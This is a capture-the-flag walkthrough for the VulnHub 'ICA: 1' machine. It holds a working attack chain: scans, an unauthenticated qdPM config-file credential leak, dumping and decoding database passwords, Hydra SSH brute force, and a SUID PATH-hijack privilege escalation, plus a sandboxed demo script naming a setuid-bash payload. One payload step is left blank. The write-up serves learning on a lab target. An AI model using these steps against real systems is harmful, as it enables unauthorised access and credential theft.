
ICA: 1

About this machine: VulnHub

Operating system: Linux

Skills used:

  • Reconfiguring machine interfaces for correct IP assignment via dhcp [Small bypass to circumvent the password]

  • Abusing qdPM 9.2 - Password Exposure (Unauthenticated)

  • Remote connection to the MYSQL service and obtaining user credentials

  • SSH brute force with Hydra

  • Abusing relative paths in a SUID binary - Path Hijacking [Privilege Escalation]

Methodology:

We start with a first reconnaissance scan with nmap:

// 
❯ nmap -T4 -sS -Pn -n -p- --open 192.168.1.141 -oN FirstScan

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-30 16:18 EDT
Nmap scan report for 192.168.1.141
Host is up (0.00084s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
33060/tcp open mysqlx
MAC Address: 00:0C:29:03:0F:2F (VMware)

We run a detailed scan (version detection plus default scripts) against the open ports:

// 
nmap -T4 -sS -Pn -n -sVC -p22,80,3306,33060 192.168.1.141 -oN sVcScan

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-30 16:20 EDT
Nmap scan report for 192.168.1.141
Host is up (0.00056s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 0e:77:d9:cb:f8:05:41:b9:e4:45:71:c1:01:ac:da:93 (RSA)
| 256 40:51:93:4b:f8:37:85:fd:a5:f4:d7:27:41:6c:a0:a5 (ECDSA)
|_ 256 09:85:60:c5:35:c1:4d:83:76:93:fb:c7:f0:7b:8e (ED25519)
80/tcp open http Apache httpd 2.4.48 ((Debian))
|_http-title: qdPM | Login
|_http-server-header: Apache/2.4.48 (Debian)
3306/tcp open mysql MySQL 8.0.26
| mysql-info:
| Protocol: 10
| Version: 8.0.26
| Thread ID: 39
| Capabilities flags: 65535
| Some Capabilities: Support41Auth, SupportsTransactions, SwitchToSSLAfterHandshake, ConnectWithDatabase, Speaks41ProtocolOld, SupportsCompression, LongPassword, IgnoreSpaceBeforeParenthesis, LongColumnFlag, Speaks41ProtocolNew, IgnoreSigpipes, InteractiveClient, SupportsLoadDataLocal, ODBCClient, DontAllowDatabaseTableColumn, FoundRows, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
| Status: Autocommit
| Salt: \x08l\x1F3w=}J<0A\x0Ec'Z\x19\x0E\x02
|_ Auth Plugin Name: caching_sha2_password
| ssl-cert: Subject: commonName=MySQL_Server_8.0.26_Auto_Generated_Server_Certificate
| Not valid before: 2021-09-25T10:47:29
|_Not valid after: 2031-09-23T10:47:29
|_ssl-date: TLS randomness does not represent time
33060/tcp open mysqlx?
| fingerprint-strings:
| DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
| Invalid message"
| HY000
| LDAPBindReq:
| *Parse error unserializing protobuf message"
| HY000
| oracle-tns:
| Invalid message-frame."
|_ HY000

We look at what is running on port 80 (screenshot):

It is a qdPM web application, version 9.2, so we check searchsploit for any known vulnerability:

// 
❯ searchsploit qdPM 9.2

Exploit Title | Path

qdPM 9.2 - Cross-site Request Forgery (CSRF) | php/webapps/50854.txt
qdPM 9.2 - Password Exposure (Unauthenticated) | php/webapps/50176.txt

Shellcodes: No Results

We get two exploits and use the second one. Opening it tells us that the database
password and connection string are stored in a YAML configuration file at a fixed
path under the web root, which an unauthenticated user can simply download:

The password and connection string for the database are
 stored in a yml file. To access the yml file you can go 
 to http:///core/config/databases.yml file and download.

We try it and the file downloads.

We inspect the YAML file:

// 
❯ cat databases.yml

all:
  doctrine:
    class: sfDoctrineDatabase
    param:
      dsn: 'mysql:dbname=qdpm;host=localhost'
      profiler: false
      username: qdpmadmin
      password: ""
      attributes:
        quote_identifier: true

That gives us a username and password for what appears to be the MySQL server. Although the DSN says host=localhost, port 3306 was reachable from the network in the scan, so we try to log in remotely:

// 
❯ mysql -uqdpmadmin -h 192.168.1.141 -p

Enter password:

MySQL [(none)]>

We are in; now we list the databases.

MySQL [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| qdpm               |
| staff              |
| sys                |
+--------------------+

We select the staff database, which is not part of qdPM and therefore worth a look.

MySQL [(none)]> use staff;

We list the tables: department, login and user. Let's take a look at them.

MySQL [staff]> show tables;
+-----------------+
| Tables_in_staff |
+-----------------+
| department |
| login |
| user |
+-----------------+

We obtain users and passwords. Note that login.user_id refers to user.id, so each password row already belongs to a specific person:

MySQL [staff]> select * from login;
+------+---------+--------------------------+
| id | user_id | password |
+------+---------+--------------------------+
| 1 | 2 | c3VSSkFkR3dMcDhkeTNyRg== |
| 2 | 4 | N1p3VjRxdGc0MmNtVVhHWA== |
| 3 | 1 | WDdNUWtQM1cyOWZld0hkQw== |
| 4 | 3 | REpjZVZ5OThXMjhZN3dMZw== |
| 5 | 5 | Y3FObkJXQ0J5UzJEdUpTeQ== |
+------+---------+--------------------------+

MySQL [staff]> select * from user;

+------+---------------+--------+---------------------------+
| id | department_id | name | role |
+------+---------------+--------+---------------------------+
| 1 | 1 | Smith | Cyber Security Specialist |
| 2 | 2 | Lucas | Computer Engineer |
| 3 | 1 | Travis | Intelligence Specialist |
| 4 | 1 | Dexter | Cyber Security Analyst |
| 5 | 2 | Meyer | Genetic Engineer |
+------+---------------+--------+---------------------------+

The passwords are base64-encoded, so we decode them into a plaintext passwords file (the users file holds the names from the user table, lowercased):

// 
❯ for password in c3VSSkFkR3dMcDhkeTNyRg== N1p3VjRxdGc0MmNtVVhHWA== WDdNUWtQM1cyOWZld0hkQw== REpjZVZ5OThXMjhZN3dMZw== Y3FObkJXQ0J5UzJEdUpTeQ==; do echo $password | base64 -d; echo; done | tee passwords

We use Hydra to try every user/password combination against SSH with the credentials obtained:

// 
❯ hydra -L usuarios -P passwords ssh://192.168.1.141

[DATA] attacking ssh://192.168.1.141:22/
[22][ssh] host: 192.168.1.141 login: travis password: DJceVy98W28Y7wLg
[22][ssh] host: 192.168.1.141 login: dexter password: 7ZwV4qtg42cmUXGX

We log in over SSH as travis:

// 
❯ ssh travis@192.168.1.141

Last login: Sat Sep 25 14:55:01 2021 from 192.168.1.7
travis@debian:~$ ls
user.txt
travis@debian:~$ cat user.txt
ICA{Secret_Project}

Now we switch to dexter with the password hydra found:

// 
travis@debian:/home/travis$ su dexter
Password:

dexter@debian:/home/travis$

We find a note in dexter's home directory:

dexter@debian:/home/travis$ cd
dexter@debian:/home/dexter$ ls
note.txt
dexter@debian:/home/dexter$ cat note.txt
It seems to me that there is a weakness while accessing the system.
As far as I know, the contents of executable files are partially viewable.
I need to find out if there is a vulnerability or not.

The note hints that something can be read out of an executable, so we hunt for SUID binaries (the `;` terminating -exec must be escaped, and the redirection belongs after it):

// 
dexter@debian:~$ find / -perm -4000 -type f -exec ls -la {} \; 2>/dev/null
-rwsr-xr-x 1 root root 16816 Sep 25 2021 /opt/get_access
-rwsr-xr-x 1 root root 58416 Feb 7 2020 /usr/bin/chfn
-rwsr-xr-x 1 root root 35040 Jul 28 2021 /usr/bin/umount
-rwsr-xr-x 1 root root 88304 Feb 7 2020 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 182600 Feb 27 2021 /usr/bin/sudo
-rwsr-xr-x 1 root root 63960 Feb 7 2020 /usr/bin/passwd
-rwsr-xr-x 1 root root 44632 Feb 7 2020 /usr/bin/newgrp
-rwsr-xr-x 1 root root 71912 Jul 28 2021 /usr/bin/su
-rwsr-xr-x 1 root root 55528 Jul 28 2021 /usr/bin/mount
-rwsr-xr-x 1 root root 52880 Feb 7 2020 /usr/bin/chsh
-rwsr-xr-x 1 root root 481608 Mar 13 2021 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 51336 Feb 21 2021 /usr/lib/dbus-1.0/dbus-daemon-launch-helper

/opt/get_access stands out: it is the only SUID-root binary that is not part of the base system. We list its strings:

// 
dexter@debian:~$ strings /opt/get_access

u/UH
[]A\A]A^A_
cat /root/system.info

The binary runs cat by bare name rather than by absolute path, so the shell that executes that command resolves cat through PATH. We can hijack it: go to the system's temp directory, create our own cat there, make it executable, and put /tmp at the front of PATH so our file is found first:

// 
dexter@debian:~$ cd /tmp
dexter@debian:/tmp$ touch cat
dexter@debian:/tmp$ chmod +x cat
dexter@debian:/tmp$ echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
dexter@debian:/tmp$ export PATH=/tmp:$PATH
dexter@debian:/tmp$ echo $PATH
/tmp:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games

We write our payload into the fake cat:

We run the SUID binary and we are root:

// 
dexter@debian:/tmp$ /opt/get_access
All services are disabled. Accessing to the system is allowed only within working hours.
dexter@debian:/tmp$ bash -p
bash-5.1# cd /root
bash-5.1# ls
root.txt system.info

Our fake cat is still first in PATH, so we restore the original PATH before reading the final flag:

// 
bash-5.1# export PATH=/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
bash-5.1# cat root.txt
ICA{Next_Generation_Self_Renewable_Genetics}
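To see the whole mechanism end to end without the real SUID binary, here is an added example (not from the original writeup) that reproduces the hijack against a throwaway stand-in for /opt/get_access and contrasts it with a hardened version that calls /bin/cat by absolute path. It assumes, as the strings output suggests, that get_access reaches cat through a shell so the bare name is resolved via PATH; the chmod u+s /bin/bash payload mentioned in a comment is the conventional choice and is an assumption, since the page does not show what was written into the fake cat. All paths and function names are this example's own.

```shell
#!/bin/sh
# Added example, not from the original writeup: stand-alone PATH hijack lab.
# A throwaway script plays the role of /opt/get_access so this runs anywhere.

# Run the lab in a temp dir and print three lines:
#   1) vulnerable victim, clean PATH     -> real cat output
#   2) vulnerable victim, hijacked PATH  -> our fake cat output
#   3) fixed victim,      hijacked PATH  -> real cat output (unaffected)
path_hijack_demo() {
    lab=$(mktemp -d) || return 1
    # Constructed stand-in for /root/system.info.
    printf 'constructed system info\n' > "$lab/system.info"

    # Victim 1: the same pattern "strings" exposed in get_access, cat by bare name.
    # (Assumption: the real binary runs this through a shell, as system() would.)
    cat > "$lab/get_access" <<EOF
#!/bin/sh
cat "$lab/system.info"
EOF
    # Victim 2: hardened, absolute path, so the caller's PATH no longer matters.
    cat > "$lab/get_access_fixed" <<EOF
#!/bin/sh
/bin/cat "$lab/system.info"
EOF
    chmod +x "$lab/get_access" "$lab/get_access_fixed"

    # Attacker-controlled directory (the writeup used /tmp) holding a fake "cat".
    # Against the real SUID-root target a typical payload is:  chmod u+s /bin/bash
    # (which is why "bash -p" afterwards yields a root shell). Here it just reports.
    mkdir "$lab/evil"
    cat > "$lab/evil/cat" <<'EOF'
#!/bin/sh
echo "HIJACKED: running as uid $(id -u) with args: $*"
EOF
    chmod +x "$lab/evil/cat"

    "$lab/get_access"                                  # line 1: genuine cat
    PATH="$lab/evil:$PATH" "$lab/get_access"           # line 2: fake cat wins lookup
    PATH="$lab/evil:$PATH" "$lab/get_access_fixed"     # line 3: absolute path, immune

    rm -rf "$lab"
}
```

Run `path_hijack_demo` as an unprivileged user: the middle line shows the fake cat being executed in place of the real one. On the target, the same lookup is performed by a process whose effective UID is root, so whatever the fake cat does is done as root; that is the whole privilege escalation, and the third line shows why an absolute path (or resetting PATH inside the privileged program) closes it.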

And with that we can call this machine finished.
